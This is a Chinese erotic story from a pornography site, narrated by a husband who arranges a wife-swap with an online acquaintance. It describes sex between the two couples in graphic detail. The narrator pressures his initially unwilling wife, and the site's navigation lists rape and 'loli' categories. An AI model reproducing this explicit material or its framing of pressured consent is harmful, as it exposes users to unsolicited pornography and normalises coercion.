【夫妻交换】【作者:不详】【完】 - 国产乱对白刺激视频 亚洲人成网站在线播放青青 国产a在亚洲线播放 国产在线精品亚洲第一区
高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
【夫妻交换】【作者:不详】【完】
2021-08-11 01:55:59

从我和老婆红嫁给我之后,她再也不去那些舞厅之类的社交场合,我知道她是不想过多的接触男人,成为我一生一世唯一的女人。

  我也尽量配合她,虽然,在她和我谈恋爱之前,我就知道她和她以前的两个男朋友有过**关系,可我从来没有计较她,嫌弃过她,仍然执着的爱着她,喜欢她,所以,从不问起也不提起她以前的事。直到有一天我在网上看到了换妻群交等内容,对那些刺激的玩法赞叹不已。

  可总是觉得那 ??都是人们为了吸引淫民而编写出来,始终不相信这是真的,可就在这不信之余,我开始迷上这类的小说,发疯似的迷上了换妻群交之类的小说,疯狂的蒐集这方面的文章,也在网上认识了一些网友,发现在网上真的也有很多同样的人,慢慢的自己也完全接受了这些观点,认为这些也是正常的性的方式之一。

  那段时间很奇怪,就是对来自我自身的性刺激的冲动微乎其微,但来自自己老婆的性刺激、性满足却能够给我造成极大的冲击和满足,例如想到把老婆暴露给其它男人,或者让她与其它男人亲热,等等,往往比自己与老婆做爱还觉得兴奋,似乎自己的性快感完全是寄托在她的身上?从那以后,我开始想像着老婆是怎幺被她以前男朋友破身和做爱的情形,我一想到自己的老婆赤身裸体地被人摁在床上,两腿间插着滑滑的硬物,一挺一挺地承受着交配的动作,甚至想亲眼看到自己老婆被另一个男人的蹂躏的情景,每次一想到这些,就会从内心里产生出一种莫名而又从未有过的兴奋和刺激,就是在大街上,鸡巴都会硬的不行。

  于是,我把这样的想法告诉我老婆后,她却用种弥漫的眼神看着我,说我是中了网毒、心理变态,我并没有被她的反对动摇,而是开始背着她在网络中找寻着有此同好的网友,所以,在我的QQ里加的全都是一些在色情论坛里认识的同性网友,在和他们交流后,我渐渐地相信,那些所谓的换妻小说大多都是真实的,其中大部分都是作者的亲身经历,当然,其中也不乏有些作者是为了寻找意淫和心里上的满足而写的,我就发过这类的小说。

  就在我苦苦找寻真诚的时候,无意中认识了叫“贝壳”的网友,在和他交流了好长一段后,最后我们聊到了关于换妻的话题后,没想到我们都有这样的想法,我们俩人交换了彼此老婆的照片后,并没有采取更进一步的行动,因为,那时候我的一切举动都是我的个人想法,是在老婆完全不知情的情况下进行的,所以我根本不敢有所造次,于是我就很少出现在网上,就这样我们失去了联系。在这期间我并没有放弃,而是做了老婆的大量工作…甚至不厌其烦地询问起,她和以前男朋友是怎幺认识的,认识了多少时间后被他们搞到手的,开始她根本就不说,到了后来她就她连他们第一次在什幺地方,用什幺方法搞的事情全都告诉了我,奇怪的是我根本就没有任何的醋意,相反的,却兴奋不已,我开始再次提前换妻的话题,渐渐地她也从不可理喻而默许了,本来我老婆就是那种贤惠乖巧的女人,于是我更疯狂地认识了一些北京、上海、江苏的网友,并和他们产生了共识,可遗憾的是我们相隔太远,所以到了关键的时候就告吹了。

  在和“贝壳”接触过的半年后,我已经渐渐的淡忘了他的存在,再加上他不停的改变网名,我几乎忘记了我们当时的承诺,就在今年的五。一前半个月,他突然又出现在我的QQ里,并和我聊起了当年的话题,弄的我有点莫名其妙,因为他已经改了网名(为了他人的隐私,赎在下不能告诉各位他真实的网名,还是以“贝壳”相称吧),这次我的胆子就大了,也就是我这次大胆的举动,使我真真实实的经历了一次换妻的游戏,使我和妻子体会到了有生以来的那种从未有过的兴奋和刺激,下面的故事就是我和“贝壳”的换妻经历。

  在和他聊了五分钟后,他告诉我他就是以前的“贝壳”时,我才从脑海的深处找到了记忆,就在我们准备进入正题时,他却告诉我他有事要出去,还没等我关闭和他的对话框,他又发来了消息,问我是谁,莫名其妙的我不知道他的葫芦里卖的什幺药,他确告诉我是“贝壳”的老婆,我是根本不相信的,在网上像这样的恶作剧是经常遇到的,我也就没把她当会事,没想到她却要求和我语聊,顿时我的眼睛一亮,有门。

  可当时我老婆和我儿子都在旁边,我没有接受,而是让她打开视频,让我看看她是男是女,当她打开视频的时候,一个二十七八岁的女子,出现在我的电脑上,当她把我半年前给她老公我老婆的照片给我看后,我确定她就是“贝壳”的老婆了,于是我迫不及待地和她俩津津有味的聊了起来,没过多久我们就成了好朋友,于是她把她的QQ告诉了我,从那天起她几乎成了我唯一的聊友,就在我们聊的投入的时候。

  有一天晚上九点过后,出现在视频前的却是个三十出头,带眼睛的男人,他 ??告诉他就是我的网友“贝壳”,聊了半年才知道他原来是带眼镜的男人,然后他的第一句话就是问我,觉得他老婆怎幺样,我说很好一个挺年轻的女人,接着我们开始谈论着自己的老婆,很快我们就进入了正题,聊起了当年换妻的话题,说他很想和我来一次真正的换妻,我想他一定也和那些无聊的网友一样,只不过说说而已,不会是真的,也就敷衍地和他聊的和真的一样。

  就这样我和他们夫妻聊了一个多星期,虽然我们聊的都很投缘,但我从来都没有把它当真,我怀疑他们也是和众多的网友一样,抱着一种好奇和猎奇别人隐私的心理进来的,直到我们交换了彼此的电话号码,并在电话里和她老婆聊了好一会,然后他也打了我老婆的手机,我们互相聊了起来,我才相信他们的举动都是真诚的,而且已经打算就在这两天来我们这里,在这个当口我又害怕起来,人也许就是这样,成天的盼着有这幺一天,可这天真的来了,就会和我一样后怕起来,最主要的是怕老婆不同意,弄的大家尴尬,人家从大老远过来,那样就太对不起人家了,然而,我还是不相信他们真的会来,于是就大胆地邀请他们。

  直到五月五日这天,我突然接到了他老婆的电话,并告诉我他们已经在来的路上了,我才意识到事情的严重性,我这里是没有问题的,最叫我担心的就是老婆那一关,别看她平时唧唧喳喳的,可到了关键的时候,我想她肯定就不行了,果然,到了中午回家,我告诉她“贝壳”和他老婆已经在路上时,她的脸马上就阴了下来,说我们完全是个疯子,我连忙解释说:“他是在路上打电话的,我总不好让他们回去,如果你不同意,就当朋友往来好了。”

  她还是满脸的不高兴,我匆匆的吃完饭就出去了当我买好菜,我怀着喘喘不安的心情,在我们约好的地方一直等到三点多钟,才看到他们的车子缓缓而来,当他们下了车,我以才仔细的打量起眼前的这对年轻的夫妇,男的大约一米七左右,还斯文地带着一付金边眼睛,显得温雅大方;女的也应该有一米六二的样子,虽然脸没我现像那样漂亮,但她的皮肤还是相当的白,看上去还是觉得挺舒服的。我把他们领进家后,还好,我的一切担心都是多余的,老婆很友好地接待了他们,我暗暗地偷笑,其实女人心真是难以琢磨。因为时间还早,再加上大家第一次见面,也需要感情的交流。

  于是,我就和老婆就陪着他们上街逛了一会,回来了一后,我很快地准备好了酒菜和丰盛的晚餐,在这种时候大家也许都和我们一样,根本无心品嚐菜的精美,匆匆地喝了点 ??酒,就宣布晚餐结束了,儿子也去了我妈妈家,家里就剩下我们四人时,我知道一切将要开始了。大家都不知道怎幺开口,毕竟这是我们的第一次,其实大家都盼着这一刻的到来,特别是我,当然他也不例外。

  我们缓解这尴尬的局面,我打开了我的电脑,把他们引到了电脑旁,本来我打算让她看看我老婆一些自拍的裸照,我老婆严厉的眼神示意我是不可以的,于是我让他们看了我在网上收集的一些自拍的图片,他们看的津津有味,特别是那个男的,眼睛都冒出了狼样的光,然后我又拿出了一些A片,让他们欣赏,我知道我老婆只要一看A片,就会受不了的,这就是让她就犯的最好的办法。

  看了一会儿,大家都有所反应了,我们俩个男人,早就撑起了帐篷,但谁都不好意思开口,仍然尴尬地僵坐着,最后,还是作为主人的我打破了僵局,提议大家先洗个澡,大家都洗完澡,最后才轮到我老婆洗,趁着我老婆洗澡的时候,我们俩个男人就当着他老婆的面,开始谈论正题了。当我问起他对我老婆的印象时,他说他的感觉非常的好,他老婆也说我老婆比照片要年轻的多,然后他又问我对他的老婆怎幺看,我当然满意了。

  在得到了相互的认可后,我们就开始计划下一步的活动,在得到了他老婆的同意后,他让我和他老婆先做,心有余沥的我没有同意,我还不知道老婆对他的印像如何,在没有徵得老婆同意就和他老婆做,怕老婆一下子受不了,闹起来就完了,毕竟大家是第一次,必须还是要得到老婆的认可才行的。

  于是,我就到卫生间,想在她洗澡的时候,做做她的思想工作,谁知还在我问她对那男人的看法时,老婆就含羞的点头默许了,女人的心事谁知道。老婆洗澡本来就很快,再加上有特殊的应酬,她洗澡的时间好像比平常快了许多,等她进了客厅,我想这时候应该可以进入正题了吧,于是,就召集了大家进了卧室,这时候大家好像非常听话似的,我和“贝壳”躺在中间,一边一个女人,我们各自抱着自己的老婆,又看起了A片,看了一会儿,我们俩个男人都忍不住了,我问大家可以开始了吗,俩个女人始终含羞不语,然而“贝壳”却大方地把他老婆推到我的身边,她老婆却说在一块做有点不习惯,于是,我们决定先分开做,做完了一次后就可以习惯地四人一块玩了,就这样,我领着她老婆去了另一个小房间,把大房间让给了他和我老婆。

  进了房间,我迫不及待地抱住他老婆吻了起来,另一只手伸进了她的胸罩,尽情地抚摸起她的乳房,有过这样经历的朋友应该知道,在这种场合,别人的老婆都不是最吸引的,最吸引人的就是:看到自己的老婆怎幺和别人亲热、调情、做爱、然后就是看着自己的老婆赤裸裸地在别的男人的身体下扭曲,那才是我们最向往最刺激的镜头。

  所以在和她老婆调情的时候,我最惦记的还是老婆这边,于是我放开他老婆,偷偷地推开我卧室的门,想看看老婆和别的的男人调情的镜头。谁知他们俩个还是原来的动作,丝毫都没有近一步的亲热举止,“贝壳”的老婆也和我同时看到了这一幕,我还没有进房间,他老婆确抢在我前面进去了,然后对着他老公的耳边轻轻不知道说了些啥,就在他老公身边躺下了,很快“贝壳”就告诉我说他老婆有点怕,不习其实我知道她是怕让我搞了她后,我老婆就会不让她老公搞了。也许是真的不习惯。

  想到这里我也回到了我老婆的旁边,继续看我们的A片,再也没有任何的举动了,过了一会“贝壳”忍不住开口了,他说他老婆有些害羞,我们夫妻先各自做一次,看情况再说,在证得我的同意后,他们就去了隔壁我儿子的房间,已经有点兴奋的我,就抱着老婆亲热起来,当我把手伸进老婆的裤裆时,“哇噻”!我老婆那里早已是爱液泛滥,阴道口的四周全都是滑滑的爱液,我知道我老婆只要是看了A片就会有强烈的反应,这时候我随便插几下,不到五分钟她就会高潮的,当她得到了满足后,也许我们的游戏就不会再进行下去了,我想还是把她这种难逢的激情,让别的男人来满足她吧,使她达到刺激的高潮。想到这里,我连忙起身到隔壁商量,当我打开隔壁房间时,里面早已是春意荡然,两个赤条条的身体紧紧地贴在一起,女的躺着,男的跪在那女人的胯间,正在舔她的乳房,女的在用手抚弄男的鸡巴,我看“贝壳”的鸡巴已经被他老婆给抚摸的异常兴奋了,龟头上冒着紫红色的光,看我进去了,女的大叫一声,害羞地背过身去,“贝壳”就式坐在床上,我不好意思有所举动,因为这是一个公平的交换,在没有得到她老公的同意,在我老婆没有让他得到之前,我是绝对不会去动他老婆的。

  谁知“贝壳”却没有停止手上的动作,继续在他老婆赤裸裸的身体上游走,并且还暗示我也去摸他的老婆,有了她男人的支持,我当然不会放过这种我千载难逢的机会了,谁知我刚把手伸到他老婆丰满的乳房上,他老婆好像很害羞地转过身去,我只好放开手,坐在床沿上看他们夫妻作爱,“贝壳”见我停止了动作,就偷偷地拿开一只手,让我摸他老婆的屁股,我顺着他老婆的屁股滑向她的阴部,用两个大拇指从扳开她的屁股,从她的后面看到了她的阴道口,她也发现了我的进攻,也许有了她老公的支持,她再没有像刚开始那样躲避我了,我开始大胆地向她的乳房摸去,和她老公俩人一人握着一个乳房,我还不时地轻揉着她粉红色的乳头,摸了将近两分钟,她始终也没动,任我们所为。

  她老公见差不多了,就想把她交给我,他到隔壁搞我老婆去,当他刚赤裸裸的直起身体想走,谁知那女的抱着他不放,并说她有点怕,要和他一块过去,于是,决定还是四个人在一块做,大家彼此都可以照顾,她默默的点点头,有了她的同意,我大胆地把一丝不挂的她,抱进了我老婆的房间,我老婆还武装整齐的在看电视,见我抱着一个赤裸裸的女人进来,后面还跟着个赤条条的男人,她的眼睛并没有因为我和那女人的举动而停留,而是很害羞的扫了一下那男人的阴部。

  我把那女的放在她旁边的时候她很配合地挪了挪,“贝壳”看见自己的老婆现在赤裸在别人的面前一丝不挂的娇躯,他的阴茎立即勃然而举,他绕过床,直接走到我老婆的床沿,也不管她同意不同意,就开始抚摸起我的老婆,俩只手指按乳房上揉摸,我老婆默默依靠在床上,羞涩地低着头,活像一个刚进洞房的新娘子,虽然心知肚明将会发生什幺样的事,但却不知该如何开始,涨红着脸,双手无意识地捏着衣角在把玩。有时悄悄斜着眼偷看我和那女的动作,“贝壳”才摸了两三下,就迫不及待地爬上床,跨蹲在我老婆的大腿上,开始脱她的衣服。

  这时的我,正蹂着他老婆的乳房,他老婆的乳房很经典,不大不小而且非常的有弹性,没有生育过的女人就是不一样,粉红色的乳头很小,一眼看上去和她的乳房不是很配,我用嘴巴亲吻着她的乳头,不时地把手伸向她的阴部,触摸她的阴蒂,那边我老婆也被“贝壳”脱的是一丝不挂了,到现在我都不会忘记,我老婆被解第一颗扣子的眼神,彷佛是一种求助;彷佛是一种无奈;又彷佛有一种激起眯眼;而更多的还是害羞。虽然,她已经不只我一个男人,可四人的群交她还是头一回,更何况还是当着老公的面和另一个男人做。

  其实,我老婆的性格很内向,并不是那种很开放的女人,虽然有三四个男人和她有过性关系,那都是在谈恋爱的时候把她搞到手的,除此以外她还算一个正经的女人,特别是她看不上眼的男人从不和他们多话的,今天她能这样真的是有点难为她了。不过还好,当她看着我时,我用一种鼓励的眼神暗示了以后,她很快就接受了,并已经配合“贝壳”的进攻,在我老婆的配合下,本来就只穿着睡衣的老婆很快就被“贝壳”扒得一丝不挂了,我老婆的阴毛很浓密,这时却全都被淫水给沾湿,黏糊糊一片狼藉,她完全没尊严的瘫开双腿,当“贝壳”把手伸进她的阴部时,情不自禁地轻叫一声,我知道此时的老婆早已经是春潮泛滥了,整个阴道口一定 ??是被爱液包裹着,难怪“贝壳”一接触到她的阴部就会吃惊。两位赤裸裸的女人,面露羞色显得很不自然。

  一会儿工夫,我也已经自己把自己被脱得精赤溜光。胯间粗硬的大鸡巴直挺挺地暴露出来。我的阴茎在“贝壳”面前就有了明显优势,比他的粗大的多,长度倒差不多,约有都十四公分长。我们俩个好奇的男人,把俩个白花花的女人放在一块,做了一个彻底的比较,我老婆是已经生育过的女人,乳房有自然点下垂,没有他老婆那幺挺拔,而且我老婆的乳头发黑;当我俩分开俩个女人的大腿时,我们都惊奇的发现,他们俩是两个完全不同的屄。说到这里有人说了:那屄就是屄,有什幺好比的那?哇塞!那可是大错特错了!因为,天下根本就没有一模一样的屄,当然老婆的屄也不除外,南屄、北屄不一样,胖屄、瘦屄各不同。

  当我看到他老婆的那两条肥肥的大白腿一张,除了阴阜上寥寥可数的一小撮嫩得像婴儿头发般的阴毛外,整个屄上面的毛发疏疏落落,几乎可一条条数出来。那屄是严丝合缝、珠圆玉润,一对小巧玲珑的小阴唇和一对大阴唇,粉红粉红的,他老婆的就是那种比较典型普通的屄,再看我老婆的就不同了,当她两条丰满的大腿一张的时候,两片肥厚的小阴唇,长长的松松垮垮的,有的2寸多长,耷拉着刚好遮住了她的阴道口,和他老婆不同的是我老婆的大阴唇上也长满了阴毛,他老婆却没有,只有屄稀稀的一点,而且他老婆是个白屄,我老婆是个黑屄,是两个完全不同的屄种。

  听道上的朋友说,我老婆的这种屄是屄中难遇的极品,当你在肏她屄的时候,那四片屄唇会紧紧地把你的鸡巴抱住,当那长长的屄唇,紧紧地包紧了你的鸡巴的时,哪个景色可是千载难逢,这也许这就是我肏了我老婆十年都没有肏够的原因吧!当“贝壳”贪婪地抚摸我老婆乌黑的阴毛和她那个非常性感、肥如馒头般的屄,然后拨开那两片肥厚的阴唇时,老婆的屄情尽现一览无余了,阴道口已经微微舒展开了,两片肥美的阴唇已经向两边张开着,阴唇四周长满了乌黑的阴毛、闪闪发光,从里面流出来一股透明的淫水,已经充满了屁股沟,连屁眼也湿了,再被那男人一摸,搞得整个阴部糊糊的,放射着诱人的光泽。比较过后,我们俩个男人都为遇到两个孑然不同的屄而高兴,“贝壳”更是喜不自禁地沾着我老婆的爱液,拨弄着我老婆的阴蒂去了。

  对我这个看惯了黑森林,而一直向往着“小白虎”的人来说,他老婆那个这种可遇不可求的珍品,与我老婆浓密的黑森林又大异其趣,也顾不上再细心欣赏了,一埋下头,就把舌尖往上面猛舔。同时用两个大拇指扳开他老婆那还紧密的阴唇,把舌头伸向她的阴蒂,当我的舌头刚接触到她的阴蒂时,我感觉她浑身颤抖了一下,我开始把我的无名指插进了她的阴道,做起了活塞运动,我渐渐地感觉到我的手指开始湿润。那边,我老婆也闭着眼睛,把腿张到了最大的限度,享受着另一个男人的抚摸,我知道这时的她已经在渴望着男人的插入,只是不好意思说。看到这里,我也停下了舔阴蒂的舌头,说道:“我老婆的水都快把你淹死了,你还不快搞。”

  我还没说完,他可能也实在忍不住了,跪在我老婆的大腿中间,将勃起的鸡巴深深的插入我老婆已经淫水泛滥的阴道中,开始抽插了起来…我舔了他老婆的阴蒂半天,也不见出水,于是我骑到了她骑到了她大腿上,把龟头对住她的屄,用龟头轻轻地磨她两片阴唇和阴蒂,但不见出水,而这时我老婆和“贝壳”已经融合在一起,看到这里我淫心大起,一手握着鸡巴,一手按住他老婆的细腰,突然下部猛的一推,只听他老婆叫了一声,我的鸡巴连根带毛地被她屄的缝,吞没得无影无踪。他老婆的阴道十分狭窄,我的阴茎被四周紧逼而热烫的阴道腔肉包裹着,舒畅得无以复加,不其然地就开始挪动着腰部前后抽送,来换取肉体上享受到的更大乐趣。

  望着鼓满青筋的大鸡巴,在一个完全陌生的屄中出出入入,由深红色一直抽插到沾满淫水,而变成蒙上一层淡白泡沫的肉棍,心里的英雄感与肉体上的美快感齐齐涌上脑中,整个人有一种腾云驾雾的轻飘飘感觉。我开始一边吸着他老婆的奶头,腰部剧烈的运动,撞击着他老婆的阴部,狠不得把整个阴茎和睾丸都塞进她的屄洞里,发出“啊”的声音。

  但是我还是没有放过那边“贝壳”和我老婆的性交的情景。他们俩就比较轻柔的多了,“贝壳”整个人全压在我老婆的身体上,并没有去舔我老婆的奶头,而是把头贴着我老婆的脸,尽情地体验从下面传上来的阵阵快感,而我老婆却把屁股抬的很高,双脚和大腿悬空朝天,发出的“扑哧扑哧”的淫水声,这样的动作能使“贝壳”的鸡巴插得更深,我老婆紧闭着眼睛,微张着嘴喘着粗气,扭动迎合着“贝壳”的抽动,我知道她很快就要达到**的高潮了。其实这一切都是我们在网上早就交流过的。

  我老婆喜欢温柔,他老婆却喜欢剧烈的,这正投了我俩之所好。老婆的反应越来越强烈了,我连忙叫“贝壳”吸我老婆的奶头,而我则把头伸了过去和她热烈的吻在一起,我当然知道老婆在高潮快来的时候,最喜欢的就是让人舔她的奶头,只要随便那幺一舔,她很快就会高潮,果然,我老婆脸开始发烫,喘着粗气,把她整个舌头都塞进了我的嘴里,我知道她达到了最刺激的高潮,而“贝壳”也感觉到了我老婆的变化,一动不动的享受着我老婆阴道抽搐,给他带来的快感。

  我和老婆虽然热烈的吻在一起,底下丝毫没有放松对他老婆的进攻,然而“贝壳”享受完我老婆的阴道运动以后,又继续起原先的动作,我老婆的双脚也从“贝壳”的腰部垂了下来,呈“大”字形的躺着,闭着眼睛,任人鱼肉的样子,让那位瘦小的男人在她的身上为所欲为。

  也许是亲眼看着自己的老婆和别的男人干简直是太刺激了,我们俩个男人居然一个姿势没换就都射了!首先是“贝壳”,也许是我老婆高潮时,阴道的收缩刺激了他,在我老婆高潮的同时,“贝壳”的全身颤抖起来,抽送变得慢而有力,每挺尽一下,便打一个哆嗦,相信每一下抽搐,便代表他在我老婆的阴道里面射出一股精液,连续抽搐了七、八下,才精疲力尽地停下,喘着粗气,他们紧紧的相搂相抱着,看到这史无前例的刺激场面,我终于禁不住丹田一股热流的冲击,也不管她老婆是否得到性的高潮,就把我体内无数的儿子也送进了他老婆的阴道里。

  当我把最后最后一滴精液射进他老婆的阴道时,那边“贝壳”都已经从我老婆的身体里,抽出了已经软缩的阴茎,我老婆赶紧撕下卫生纸递给了他,然后,自己也抓了把卫生纸,用我早已非常熟悉的动作,把卫生纸堵住阴道口,然后蹲在床上那毛茸茸的肉洞口立刻也冒出半透明的精液,全落在了纸上。俩个女人几乎用同样的动作和方式结束了第一轮的交媾游戏。当我精尽力疲地倒在床上,大口大口地喘着气时,老婆已经已经把她的下身清洗完了,并已经放好了水让“贝壳”也去洗洗,当我最后一个清洗完,回到房间时,他们三人都已经躺好了方位,就像什幺事也没有发生一样,看起了电视,我老婆躺在最外面,“贝壳”很自然的躺在中间,自然就把他老婆和最里面的位置留给了我。

  因为刚过春末,赤裸着身体还是有点凉意,俩个怕冷的女人虽然都已经套 ??了件睡衣,下身却是一丝不挂,“贝壳”却赤裸裸很大方的躺着,一手一个搂着俩个的女人,潇洒地在她们敞开的衣襟里,一手抓着完全不同类型乳房,我老婆的乳房本来就不大,整个乳房几乎都被他的手掌摀住了,看我进来后,他很自觉的抽出了手,把他的老婆的乳房让给了我,当我赤裸地躺在床上时,电视里还在播放着A片上着男女媾合的镜头。

  刚刚做完爱的我,好像比平时的精神好了许多,丝毫也没有疲倦的感觉,依然和“贝壳”谈论起刚才的性交的感受,他对我老婆在高潮时,阴道收缩的感觉特别的好,这种感觉他说他很少几乎没有在他老婆的身体上感受的到,而我感触最深的就是他老婆的阴道非常的有压迫和紧迫感,这也是她没有生育过的优势。说着说着我渐渐地发现,我老婆粉面飞红,一只绵软细嫩的手儿也不由自主地伸到“贝壳”的胯下,轻轻地抚摸着他的阴茎,眼睛又露出了丝丝的情迷,原来“贝壳”正用两个手指捏住了她那最敏感的奶头。平时在看A片的时候,只要我随便的把她的奶头一揉,她就会全身颤动不已,显然,她又一次被“贝壳”挑逗的已经动情了。

  不一会儿,“贝壳”那因为缩小而躲进包皮里面的龟头,再一次在我老婆的手心里钻了出来,他大声的赞叹我老婆摸鸡巴的技术,摸的他特别的舒服,还没说完,我看到他把手伸进了盖在我老婆下身的毛巾毯里,虽然隔着毛巾毯,我什幺也看不见,但是,从他的动作可以看的出来,他正在用手指抠我老婆的阴部,为了证明我的判断,我掀开了毛巾毯,果然,他的中指在我老婆的阴蒂上飞快的抖动。见我掀开了毯子,我老婆本来张开的大腿,不好意思的合拢起来,刚好把他的整个手掌都夹在了她的阴部。见他们如此的卖力,我当然也不会落后,一边用手抱住他老婆的臀部,嘴巴也大口吸吮着她丰满坚挺的左乳,另一手则用力搓弄她的右乳。

  而他老婆完全像一只任人宰割的羔羊,一点反应都没有,可能是看着自己的鸡巴在我老婆手心里,再次青筋暴胀,再看看我那歪倒在胯间的鸡巴,“贝壳”推了他老婆一把,说了一句我听不懂浙江话,他老婆才慢慢的把手伸到我的胯间,一把抓住我的鸡巴,被它那幺一摸,我才感觉到他老婆摸鸡巴的水平实在是太差了,和我老婆完全不是一个水平线上的,难怪“贝壳”完全被我老婆的摸鸡巴技术所折服。他老婆那不是叫爱抚鸡巴,而是在给我的鸡巴上刑,她的手整个的握住我的鸡巴,不是上下的套弄,却是用她的大拇指,在我的龟沟里摩擦,还好她的的手还算娇嫩,不然我还真当心那天的龟头会被她摸破。我报复似 ??的用手指在她的阴道里用力抠着,隐隐的感觉到她的阴道里,还残留着我那滑腻的精液。

  那边“贝壳”把我老婆的娇躯压在身下,这时我见到老婆已经情不自禁用她的巧手把他的肉棒导入自己的肉洞里,她双目紧闭,不再望我这边,却主动地扭腰摆臀,用她的阴道研磨着“贝壳”的鸡巴。

  我放开他老婆,停下了自己的动作…歪过身体,低下头去看他们两个交融在一起的性器官,盼望已久的情景终于发生在我眼前,这份刺激真的是难以形容, “贝壳”那并不粗大的鸡巴,像木匠做好的榫头一样,已经严严实实地镶嵌在我老婆的肉洞里。我老婆那两片肥大而又娇嫩的小阴唇此刻红通通地形成环管状,正像淫民们所说的那样,紧紧包裹着那沾满淫水、他们开始抽插,我在一边低头欣赏着两个性器官交接的美妙动人画面,见一条和我一般长比我细一圈的阴茎在老婆鲜艳欲滴的两片小阴唇中间出出入入,把一股又一股流出外的淫水给带得飞溅四散。难得她阴道口的嫩皮也特别长,随着阴茎的抽送而被拖得一翻一翻,清楚得像小电影中的特写镜头;整个屄由于充血而变得通红,小阴唇硬硬地裹着青筋毕露的阴茎,让磨擦得来的快感更敏锐强烈,出入不停的阴茎,一抽一插,一收一放,那阴道边沿的嫩肉也一凹一凸地翻出翻进,他的阴囊随着他的每一次插入都重重地打在着我老婆的会阴,发出‘,’的声音。

  也许是受到眼前情景的刺激,我的阴茎已经是坚韧如铁,这次我也变了个花式,我把她侧卧在床上,她一条腿软软地垂在床下,另一条腿在床上,这都是“贝壳”告诉我,他老婆最喜欢男人站在地上肏她。这次,我很轻松的就把鸡巴送进了她的肉洞,开始快速地在她销魂洞里出出入入。因为“贝壳”曾经在网上就告诉过我,他老婆有点性冷淡,很少几乎没有性高潮的,凭我的经验,有些女人必须剧烈的撞击,才会产生性高潮,于是,我用上了比平时快上两到三倍的速度,在她的肉洞里刺杀,一口气连续抽送了两百多下,很快我就感觉到腰部坚持不住了,为了让自己休息一下,我乾脆爬上了床,把整个身体全压在她的身体,用舌头舔拨她的耳垂,下体继续挺动,双手各握一只乳房分别搓揉,轻摸慢擦,乐不思蜀。

  那边,“贝壳”也把我那老婆干得醉眼如丝,全身瘫痪,软躺在床上手脚四张,任着下体任由他乱捣乱插,“贝壳”抽得性起,乾脆跪在她的胯间,双手撑在她腋旁,两腿后撑,这样可以让阴茎可以插得更深入,抽得更爽快。老婆看来也心有灵犀,两在腿用力向上抬,让下体可以挺得更高,来迎接“贝壳”的进攻。果然,他每一下冲击,她都把屁股随着他下身的高低起伏而上下迎送,她的阴蒂外面罩着的嫩皮被阴唇扯动,把它反复揉磨,令它越来越涨,越来越硬,冒着好光,向前直挺,几乎碰到正忙得不可开交的阴茎。合作得天衣无缝。

  一时间,满睡房声响大作,除了器官碰撞的“辟哩啦”声,还有淫水“吱唧吱唧”的伴奏,环回立体、春色无边。就他们现在的姿势,使我更加清楚的看清楚他们镶嵌这一起的器官,我老婆双腿提高,她屁股自然也离地几寸,屄向上大张,于是“贝壳”便得以对正炮位,下下受力,鸡巴不禁抽插得坚硬如铁。

  抽出来时青筋沾满我老婆白白的淫水,插进去时龟头直撞到尽。我把老婆的膝盖往两边拉开一些,以便屄也张阔到像一张嘴,我一边干他老婆一边观赏“贝壳”的鸡巴在我老婆阴道里抽送的美景,她浓密的阴毛遮不住勃得硬挺的阴蒂,已经胀大得铅笔头般粗了,在黑漆漆的阴毛丛中露出粉红色的尖端,活像一个小小的龟头,被不断反动着的小阴唇牵扯得一冒一冒,我被引诱得不禁伸出手去将它捻住,轻轻来回搓转,阿红被撩弄得醉眼如丝、朱唇半张,舒服得把前胸一挺一抬。

  此刻小阴唇就算不用指头撑也自动掰向两旁,淫水满溢的粉红色阴道口,便清清楚楚地展露在眼前。看到这里,我禁不住伸出手去,抚摸着她 ??的阴蒂,“贝壳”丝毫没有减弱挺进的速度,鸡巴鞭鞭有力地在我老婆鼓涨的屄中一出一入地抽插,淫水被磨擦得变成无数的小泡泡,白蒙蒙地浆满在屄口四周,会阴中的薄皮随着他的挺动,一凹一凸地起伏得像个鼓风机,阴道口的嫩皮被阴茎带入拖出,荟为奇观。很快我老婆又在他的进攻下,再一次得到了高潮,她的会阴处的肌肉,剧烈的收缩,付有节奏的夹弄着“贝壳”的肉棒,我一直无缘看到老婆在高潮时,阴部收缩的情景,今天终于如愿以嚐了。

  兴奋不已的我用力冲击着他老婆的身体,每一次的进攻,都会棍棍到底,但是,人的力量是有限的,不一会儿就气喘吁吁了,为了不影响她老婆的高潮,我赶紧让“贝壳”来接我的班,他二话没说,从我老婆的阴道里拔出了依然坚韧的鸡巴,“扑哧”一下,塞进了他老婆的肉洞里,把他老婆的两条腿挂在自己的肩膀上,重复着我的动作。

  从“贝壳”离开我老婆身体的那一刹那,我老婆还保持着刚才和“贝壳”肏屄的姿势,因为刚刚高潮阴道扩展的很大,屄口张的还大,还保持着“贝壳”鸡巴的形状,一眼就可以看到里,因为充血而成了紫红色的褶皱肉环,为了不让我的鸡巴遭到冷落而软火,赶紧把它放进了老婆的屄洞里,轻轻的摩擦着。那边,“贝壳”和他老婆已战的不可开交,他们的动作很剧烈,不一会儿他也败下阵来,我又接着上,还是不能让他老婆高潮,“贝壳”提议,让我从后面乾他老婆,他说他老婆很喜欢这个动作,于是他老婆很配合的用四肢着地,跪在床上,我双手扶着他老婆的纤腰,一边推拉,一边挺动下体,辟辟拍拍地反复抽送,继续享受着屄磨擦龟头所带来的一阵阵快感。她没叫嚷,整个人像死去一般,只有身体在我的猛力碰撞下前后挪动,胸前一对乳房也跟随着荡来荡去。

  在我的提议下,我老婆和“贝壳”也换了姿势,他被老婆骑在身下,享受着我老婆肉屄的套弄,这样我正好从后面可以看到进出在老婆肉洞里的鸡巴,而他则可以腾出手来抚摸起他老婆来回抖动的乳房了,还不时的用手在下面刺激他老婆的阴蒂,我那只空闲的手当然就在我老婆的乳房上游动了。也许是受到我们的影响;也许是我老婆骑马的功夫一流,只一会“贝壳”就大呼我老婆停下动作,他不说我也知道,他是怕在我前面射精不好意思,他拔出了肉棒,在我旁边休息了一会,筋疲力尽的我又把他老婆交给了他,而我还是和刚才一样,趴在老婆的身上休息,等他再一次把他老婆还到我手里时,他已经是大汗淋淋了,他那像死屄一样的老婆,还是一点反应都没有,为了不付众望,我抱着他老婆又肏开了。

